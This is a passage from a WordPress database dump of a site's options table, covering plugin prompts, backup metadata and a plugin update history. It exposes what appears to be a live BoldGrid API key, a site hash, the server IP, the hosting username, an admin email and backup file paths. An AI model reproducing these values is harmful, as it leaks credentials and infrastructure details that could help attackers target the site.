10:\"wpcl_posts\";i:48;s:23:\"wpcl_rtec_registrations\";i:49;s:18:\"wpcl_sdm_downloads\";i:50;s:19:\"wpcl_simple_history\";i:51;s:28:\"wpcl_simple_history_contexts\";i:52;s:13:\"wpcl_snippets\";i:53;s:23:\"wpcl_term_relationships\";i:54;s:18:\"wpcl_term_taxonomy\";i:55;s:13:\"wpcl_termmeta\";i:56;s:10:\"wpcl_terms\";i:57;s:16:\"wpcl_tm_taskmeta\";i:58;s:13:\"wpcl_tm_tasks\";i:59;s:13:\"wpcl_usermeta\";i:60;s:10:\"wpcl_users\";i:61;s:19:\"wpcl_wfblockediplog\";i:62;s:14:\"wpcl_wfblocks7\";i:63;s:13:\"wpcl_wfconfig\";i:64;s:15:\"wpcl_wfcrawlers\";i:65;s:18:\"wpcl_wffilechanges\";i:66;s:15:\"wpcl_wffilemods\";i:67;s:11:\"wpcl_wfhits\";i:68;s:13:\"wpcl_wfhoover\";i:69;s:13:\"wpcl_wfissues\";i:70;s:20:\"wpcl_wfknownfilelist\";i:71;s:23:\"wpcl_wflivetraffichuman\";i:72;s:11:\"wpcl_wflocs\";i:73;s:13:\"wpcl_wflogins\";i:74;s:21:\"wpcl_wfls_2fa_secrets\";i:75;s:21:\"wpcl_wfls_role_counts\";i:76;s:18:\"wpcl_wfls_settings\";i:77;s:20:\"wpcl_wfnotifications\";i:78;s:20:\"wpcl_wfpendingissues\";i:79;s:19:\"wpcl_wfreversecache\";i:80;s:21:\"wpcl_wfsecurityevents\";i:81;s:16:\"wpcl_wfsnipcache\";i:82;s:13:\"wpcl_wfstatus\";i:83;s:19:\"wpcl_wftrafficrates\";i:84;s:18:\"wpcl_wfwaffailures\";i:85;s:22:\"wpcl_wonderplugin_tabs\";i:86;s:20:\"wpcl_wpc_accesslocks\";i:87;s:20:\"wpcl_wpc_login_fails\";i:88;s:23:\"wpcl_wpforms_tasks_meta\";i:89;s:11:\"wpcl_wpgmza\";i:90;s:19:\"wpcl_wpgmza_circles\";i:91;s:16:\"wpcl_wpgmza_maps\";i:92;s:19:\"wpcl_wpgmza_polygon\";i:93;s:21:\"wpcl_wpgmza_polylines\";i:94;s:22:\"wpcl_wpgmza_rectangles\";i:95;s:28:\"wpcl_wpmailsmtp_debug_events\";i:96;s:26:\"wpcl_wpmailsmtp_tasks_meta\";i:97;s:21:\"wpcl_xsg_sitemap_meta\";}s:4:\"step\";i:1;}','yes'),(137,'bglib_activity','a:2:{s:5:\"bgppb\";a:3:{s:14:\"dedicated_user\";i:12;s:13:\"block_install\";i:258;s:10:\"block_save\";i:61;}s:15:\"boldgrid-backup\";a:3:{s:18:\"any_backup_created\";i:523;s:24:\"update_title_description\";i:6;s:25:\"download_to_local_machine\";i:14;}}','yes'),(138,'bglib_rating_prompt','a:2:{i:0;a:5:{s:6:\"plugin\";s:5:\"bgppb\";s:4:\"name\";s:14:\"dedicated_user\";s:6:\"slides\";a:4:{s:5:\"start\";a:2:{s:4:\"text\";s:238:\"Great job keeping your plugin up to date and thank you for being a dedicated BoldGrid user. If you feel you\'re getting really good value from the Post and Page Builder by BoldGrid, could you do us a favor and rate us 5 stars on WordPress?\";s:9:\"decisions\";a:3:{s:9:\"sure_will\";a:3:{s:4:\"text\";s:17:\"Yes, I sure will!\";s:4:\"link\";s:67:\"https://wordpress.org/support/plugin/post-and-page-builder/reviews/\";s:5:\"slide\";s:6:\"thanks\";}s:19:\"maybe_still_testing\";a:3:{s:4:\"text\";s:42:\"Maybe later, I\'m still testing the plugin.\";s:6:\"snooze\";i:604800;s:5:\"slide\";s:11:\"maybe_later\";}s:11:\"already_did\";a:2:{s:4:\"text\";s:13:\"I already did\";s:5:\"slide\";s:11:\"already_did\";}}}s:6:\"thanks\";a:1:{s:4:\"text\";s:405:\"Thanks! A new page should have opened to the Post and Page Builder ratings page on WordPress.org. You will need to log in to your WordPress.org account before you can post a review. If the page didn\'t open, please click the following link: <a href=\"https://wordpress.org/support/plugin/post-and-page-builder/reviews/\" target=\"_blank\">https://wordpress.org/support/plugin/post-and-page-builder/reviews/</a>\";}s:11:\"maybe_later\";a:1:{s:4:\"text\";s:240:\"No problem, maybe now is not a good time. We want to be your WordPress page builder of choice. If you\'re experiencing a problem or want to make a suggestion, please <a href=\"https://www.boldgrid.com/feedback\" target=\"_blank\">click here</a>.\";}s:11:\"already_did\";a:1:{s:4:\"text\";s:280:\"Thank you for the previous rating! You can help us to continue improving the Post and Page Builder by reporting any bugs or submitting feature requests <a href=\"https://www.boldgrid.com/feedback\" target=\"_blank\">here</a>. Thank you for using the Post and Page Builder by BoldGrid!\";}}s:10:\"time_added\";i:1562103813;s:14:\"time_dismissed\";i:1562103867;}i:1;a:7:{s:6:\"plugin\";s:15:\"boldgrid-backup\";s:4:\"name\";s:18:\"any_backup_created\";s:6:\"slides\";a:4:{s:5:\"start\";a:2:{s:4:\"text\";s:208:\"It looks like you\'ve created 10 backups with the BoldGrid Backup Plugin! If you feel you\'re getting really good value from the BoldGrid Backup plugin, could you do us a favor and rate us 5 stars on WordPress?\";s:9:\"decisions\";a:3:{s:9:\"sure_will\";a:3:{s:4:\"text\";s:17:\"Yes, I sure will!\";s:4:\"link\";s:61:\"https://wordpress.org/support/plugin/boldgrid-backup/reviews/\";s:5:\"slide\";s:6:\"thanks\";}s:19:\"maybe_still_testing\";a:3:{s:4:\"text\";s:42:\"Maybe later, I\'m still testing the plugin.\";s:6:\"snooze\";i:604800;s:5:\"slide\";s:11:\"maybe_later\";}s:11:\"already_did\";a:2:{s:4:\"text\";s:13:\"I already did\";s:5:\"slide\";s:11:\"already_did\";}}}s:6:\"thanks\";a:1:{s:4:\"text\";s:387:\"Thanks! A new page should have opened to the BoldGrid Backup ratings page on WordPress.org. You will need to log in to your WordPress.org account before you can post a review. If the page didn\'t open, please click the following link: <a href=\"https://wordpress.org/support/plugin/boldgrid-backup/reviews/\" target=\"_blank\">https://wordpress.org/support/plugin/boldgrid-backup/reviews/</a>\";}s:11:\"maybe_later\";a:1:{s:4:\"text\";s:241:\"No problem, maybe now is not a good time. We want to be your WordPress backup plugin of choice. If you\'re experiencing a problem or want to make a suggestion, please <a href=\"https://www.boldgrid.com/feedback\" target=\"_blank\">click here</a>.\";}s:11:\"already_did\";a:1:{s:4:\"text\";s:270:\"Thank you for the previous rating! You can help us to continue improving the BoldGrid Backup plugin by reporting any bugs or submitting feature requests <a href=\"https://www.boldgrid.com/feedback\" target=\"_blank\">here</a>. Thank you for using the BoldGrid Backup plugin!\";}}s:10:\"time_added\";i:1564372024;s:12:\"time_snoozed\";i:1564415915;s:18:\"time_snoozed_until\";i:1565020715;s:14:\"time_dismissed\";i:1565024766;}}','yes'),(143,'boldgrid_pointers','a:4:{i:0;a:6:{s:2:\"id\";s:37:\"boldgrid_image_search_internal_only_8\";s:6:\"screen\";s:4:\"page\";s:6:\"target\";s:19:\"#media-search-input\";s:5:\"title\";s:12:\"Image search\";s:7:\"content\";s:222:\"<em>This search function</em> helps you find images you\'ve already uploaded to your Media Library. If you would like to search the web for new images, click the <strong>BoldGrid Connect Search</strong> tab in the top menu.\";s:8:\"position\";a:2:{s:4:\"edge\";s:5:\"right\";s:5:\"align\";s:6:\"middle\";}}i:1;a:6:{s:2:\"id\";s:49:\"boldgrid_media_library_image_search_internal_only\";s:6:\"screen\";s:6:\"upload\";s:6:\"target\";s:19:\"#media-search-input\";s:5:\"title\";s:12:\"Image search\";s:7:\"content\";s:222:\"<em>This search function</em> helps you find images you\'ve already uploaded to your Media Library. If you would like to search the web for new images, click the <strong>BoldGrid Connect Search</strong> tab in the top menu.\";s:8:\"position\";a:3:{s:4:\"edge\";s:3:\"top\";s:5:\"align\";s:6:\"middle\";s:17:\"open_on_page_load\";b:0;}}i:2;a:6:{s:2:\"id\";s:38:\"boldgrid_image_size_do_you_need_help_8\";s:6:\"screen\";s:12:\"media-upload\";s:6:\"target\";s:11:\"#image_size\";s:5:\"title\";s:10:\"Image size\";s:7:\"content\";s:33:\"Need help choosing an image size?\";s:8:\"position\";a:2:{s:4:\"edge\";s:5:\"right\";s:5:\"align\";s:6:\"middle\";}}i:3;a:6:{s:2:\"id\";s:29:\"boldgrid_customization_widget\";s:6:\"screen\";s:9:\"dashboard\";s:6:\"target\";s:21:\"#customization_widget\";s:5:\"title\";s:35:\"Begin customizing your new website!\";s:7:\"content\";s:130:\"Congratulations, you&#039;ve just installed your new website! Below you&#039;ll find tips to help you begin customizing your site.\";s:8:\"position\";a:2:{s:4:\"edge\";s:6:\"bottom\";s:5:\"align\";s:6:\"middle\";}}}','yes'),(187,'boldgrid_backup_last_backup','1700042491','no'),(188,'boldgrid_backup_latest_backup','a:33:{s:4:\"mode\";s:6:\"backup\";s:6:\"dryrun\";b:0;s:10:\"compressor\";s:7:\"php_zip\";s:8:\"filesize\";i:474891078;s:4:\"save\";b:1;s:10:\"total_size\";i:788013557;s:14:\"folder_include\";s:18:\"WPCORE,/wp-content\";s:14:\"folder_exclude\";s:17:\".git,node_modules\";s:13:\"table_exclude\";a:0:{}s:5:\"title\";N;s:11:\"description\";N;s:7:\"ABSPATH\";s:26:\"/home/eckank5/public_html/\";s:9:\"backup_id\";s:8:\"9ea03425\";s:7:\"siteurl\";s:29:\"https://eckankar-colorado.org\";s:9:\"timestamp\";i:1700042403;s:17:\"gateway_interface\";s:7:\"CGI/1.1\";s:9:\"http_host\";s:21:\"eckankar-colorado.org\";s:13:\"php_sapi_name\";s:8:\"fpm-fcgi\";s:9:\"php_uname\";s:84:\"Linux server.eckankar-colorado.org 4.18.0 #1 SMP Thu Dec 15 20:31:06 MSK 2022 x86_64\";s:11:\"php_version\";s:6:\"8.0.30\";s:11:\"server_addr\";s:15:\"173.231.231.205\";s:11:\"server_name\";s:21:\"eckankar-colorado.org\";s:15:\"server_protocol\";s:8:\"HTTP/1.1\";s:15:\"server_software\";s:6:\"Apache\";s:3:\"uid\";i:1001;s:8:\"username\";s:7:\"eckank5\";s:10:\"encrypt_db\";b:0;s:7:\"trigger\";s:4:\"Cron\";s:8:\"filepath\";s:96:\"/home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231115-100016.zip\";s:11:\"lastmodunix\";i:1700042491;s:8:\"duration\";s:5:\"87.31\";s:11:\"db_duration\";s:4:\"6.21\";s:11:\"db_filename\";s:35:\"eckank5_bgri484.20231115-100004.sql\";}','yes'),(191,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:31:\"webmaster@eckankar-colorado.org\";s:7:\"version\";s:5:\"6.4.1\";s:9:\"timestamp\";i:1699493573;}','no'),(209,'boldgrid_api_key','c208ede037e64a2f8831e7c6c5a8886d','no'),(210,'boldgrid_site_hash','af86c72d8b4137449e65e7ae04956675','no'),(230,'boldgrid_inspirations_current_version','2.7.1','no'),(231,'boldgrid_inspirations_redirect','1562362854','yes'),(239,'boldgrid_inspirations_activated_version','2.6.5','no'),(240,'recovery_keys','a:0:{}','yes'),(312,'wpforms_shareasale_redirect','https://wpforms.com/lite-upgrade','yes'),(352,'boldgrid_backup_history','a:100:{i:0;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1697079179;s:7:\"message\";s:48:\"Simple History plugin upgraded to version 4.7.0.\";}i:1;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1697079206;s:7:\"message\";s:72:\"Smart Custom 404 error page [404page] plugin upgraded to version 11.4.4.\";}i:2;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1697142964;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231012-203446.zip.\";}i:3;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1697142965;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231002-204611.zip\";}i:4;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1697142967;s:7:\"message\";s:35:\"WordPress updated to version 6.3.1.\";}i:5;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1697619687;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231018-090013.zip.\";}i:6;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1697619688;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231011-090012.zip\";}i:7;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1697730584;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231019-154832.zip.\";}i:8;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1697730585;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231012-024235.zip\";}i:9;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1697730647;s:7:\"message\";s:45:\"Autoptimize plugin upgraded to version 3.1.9.\";}i:10;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1697730671;s:7:\"message\";s:47:\"Fluent Forms plugin upgraded to version 5.0.12.\";}i:11;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1697730695;s:7:\"message\";s:56:\"Modern Events Calendar plugin upgraded to version 7.2.1.\";}i:12;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1697730708;s:7:\"message\";s:48:\"Simple History plugin upgraded to version 4.7.1.\";}i:13;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1697730722;s:7:\"message\";s:71:\"WP-Optimize - Clean, Compress, Cache plugin upgraded to version 3.2.21.\";}i:14;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698118161;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231024-032815.zip.\";}i:15;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698118162;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231012-203446.zip\";}i:16;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698162975;s:7:\"message\";s:68:\"XML Sitemap Generator for Google plugin (version 2.0.7) deactivated.\";}i:17;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698163073;s:7:\"message\";s:56:\"Sitemap by BestWebSoft plugin (version 3.2.9) activated.\";}i:18;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698163283;s:7:\"message\";s:66:\"XML Sitemap Generator for Google plugin (version 2.0.7) activated.\";}i:19;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698163347;s:7:\"message\";s:68:\"XML Sitemap Generator for Google plugin (version 2.0.7) deactivated.\";}i:20;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1698163823;s:7:\"message\";s:53:\"Wordfence Security plugin upgraded to version 7.10.5.\";}i:21;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698188419;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231024-225908.zip.\";}i:22;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698188421;s:7:\"message\";s:165:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org_staging-9ea03425-20231016-164451.zip\";}i:23;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698188455;s:7:\"message\";s:56:\"Modern Events Calendar plugin upgraded to version 7.2.2.\";}i:24;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698188467;s:7:\"message\";s:40:\"Modula plugin upgraded to version 2.7.8.\";}i:25;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698188476;s:7:\"message\";s:56:\"Post and Page Builder plugin upgraded to version 1.25.1.\";}i:26;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698188495;s:7:\"message\";s:47:\"WPCode Lite plugin upgraded to version 2.1.4.1.\";}i:27;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1698224485;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231025-090011.zip.\";}i:28;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1698224487;s:7:\"message\";s:165:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org_staging-9ea03425-20231016-232303.zip\";}i:29;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698261711;s:7:\"message\";s:64:\"XML Sitemap Generator for Google plugin (version 2.0.7) deleted.\";}i:30;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698261761;s:7:\"message\";s:67:\"XML Sitemap Generator for Google plugin (version 4.1.13) activated.\";}i:31;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698261795;s:7:\"message\";s:58:\"Sitemap by BestWebSoft plugin (version 3.2.9) deactivated.\";}i:32;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698261811;s:7:\"message\";s:56:\"Sitemap by BestWebSoft plugin (version 3.2.9) activated.\";}i:33;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698261841;s:7:\"message\";s:58:\"Sitemap by BestWebSoft plugin (version 3.2.9) deactivated.\";}i:34;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698261852;s:7:\"message\";s:54:\"Sitemap by BestWebSoft plugin (version 3.2.9) deleted.\";}i:35;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698262667;s:7:\"message\";s:80:\"WP STAGING - Backup Duplicator &amp; Migration plugin upgraded to version 3.1.0.\";}i:36;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698290635;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231026-032248.zip.\";}i:37;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698290637;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231018-090013.zip\";}i:38;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698290727;s:7:\"message\";s:53:\"Really Simple SSL plugin (version 7.1.3) deactivated.\";}i:39;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698431941;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231027-183752.zip.\";}i:40;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698431943;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231019-154832.zip\";}i:41;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1698768871;s:7:\"message\";s:53:\"Wordfence Security plugin upgraded to version 7.10.6.\";}i:42;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1698829277;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231101-090008.zip.\";}i:43;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1698829278;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231024-032815.zip\";}i:44;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698983163;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231103-034459.zip.\";}i:45;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1698983164;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231024-225908.zip\";}i:46;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699030739;s:7:\"message\";s:58:\"Advanced Google reCAPTCHA plugin upgraded to version 1.12.\";}i:47;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699030790;s:7:\"message\";s:46:\"Fluent Forms plugin upgraded to version 5.1.0.\";}i:48;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699030815;s:7:\"message\";s:56:\"GA Google Analytics plugin upgraded to version 20231101.\";}i:49;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699030841;s:7:\"message\";s:42:\"Passster plugin upgraded to version 4.2.5.\";}i:50;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699031383;s:7:\"message\";s:48:\"Simple History plugin upgraded to version 4.7.2.\";}i:51;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699031410;s:7:\"message\";s:50:\"WP Fastest Cache plugin upgraded to version 1.2.1.\";}i:52;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699119337;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231104-173430.zip.\";}i:53;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699119338;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231025-090011.zip\";}i:54;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699119532;s:7:\"message\";s:46:\"Fluent Forms plugin upgraded to version 5.1.1.\";}i:55;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1699373453;s:7:\"message\";s:53:\"Wordfence Security plugin upgraded to version 7.10.7.\";}i:56;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699375429;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231107-164245.zip.\";}i:57;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699375431;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231026-032248.zip\";}i:58;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699375476;s:7:\"message\";s:49:\"Really Simple SSL plugin (version 7.1.3) deleted.\";}i:59;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699375557;s:7:\"message\";s:63:\"Post and Page Builder Premium plugin upgraded to version 1.1.2.\";}i:60;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699375570;s:7:\"message\";s:64:\"UpdraftPlus - Backup/Restore plugin upgraded to version 1.23.11.\";}i:61;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699375579;s:7:\"message\";s:80:\"WP STAGING - Backup Duplicator &amp; Migration plugin upgraded to version 3.1.1.\";}i:62;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699375631;s:7:\"message\";s:47:\"Code Snippets plugin upgraded to version 3.6.1.\";}i:63;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699375907;s:7:\"message\";s:54:\"Redis Object Cache plugin (version 2.4.4) deactivated.\";}i:64;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699375999;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231107-165232.zip.\";}i:65;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699376000;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231027-183752.zip\";}i:66;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699376183;s:7:\"message\";s:52:\"Redis Object Cache plugin (version 2.4.4) activated.\";}i:67;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1699437686;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231108-100011.zip.\";}i:68;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1699437687;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231101-090008.zip\";}i:69;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699466562;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231108-180134.zip.\";}i:70;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699466564;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231103-034459.zip\";}i:71;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699466683;s:7:\"message\";s:45:\"Ninja Forms plugin upgraded to version 3.7.0.\";}i:72;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699466697;s:7:\"message\";s:42:\"Passster plugin upgraded to version 4.2.6.\";}i:73;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699466717;s:7:\"message\";s:64:\"UpdraftPlus - Backup/Restore plugin upgraded to version 1.23.12.\";}i:74;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699466728;s:7:\"message\";s:45:\"WPCode Lite plugin upgraded to version 2.1.5.\";}i:75;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699466971;s:7:\"message\";s:35:\"WordPress updated to version 6.3.2.\";}i:76;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699467075;s:7:\"message\";s:50:\"Twenty Twenty-Three theme upgraded to version 1.3.\";}i:77;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1699493567;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231109-013142.zip.\";}i:78;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1699493569;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231104-173430.zip\";}i:79;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1699493570;s:7:\"message\";s:33:\"WordPress updated to version 6.4.\";}i:80;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699761580;s:7:\"message\";s:44:\"Passster plugin (version 4.2.6) deactivated.\";}i:81;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699995655;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231114-205925.zip.\";}i:82;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699995657;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231107-164245.zip\";}i:83;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699995764;s:7:\"message\";s:46:\"Autoptimize plugin upgraded to version 3.1.10.\";}i:84;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699995784;s:7:\"message\";s:47:\"Code Snippets plugin upgraded to version 3.6.2.\";}i:85;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699995800;s:7:\"message\";s:46:\"Fluent Forms plugin upgraded to version 5.1.2.\";}i:86;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699995856;s:7:\"message\";s:56:\"Modern Events Calendar plugin upgraded to version 7.3.0.\";}i:87;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699995929;s:7:\"message\";s:67:\"Responsive Accordion And Collapse plugin upgraded to version 2.4.6.\";}i:88;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699995945;s:7:\"message\";s:50:\"WP Fastest Cache plugin upgraded to version 1.2.2.\";}i:89;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699995975;s:7:\"message\";s:80:\"WP STAGING - Backup Duplicator &amp; Migration plugin upgraded to version 3.1.2.\";}i:90;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699996076;s:7:\"message\";s:42:\"Passster plugin (version 4.2.6) activated.\";}i:91;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699996231;s:7:\"message\";s:44:\"Passster plugin (version 4.2.6) 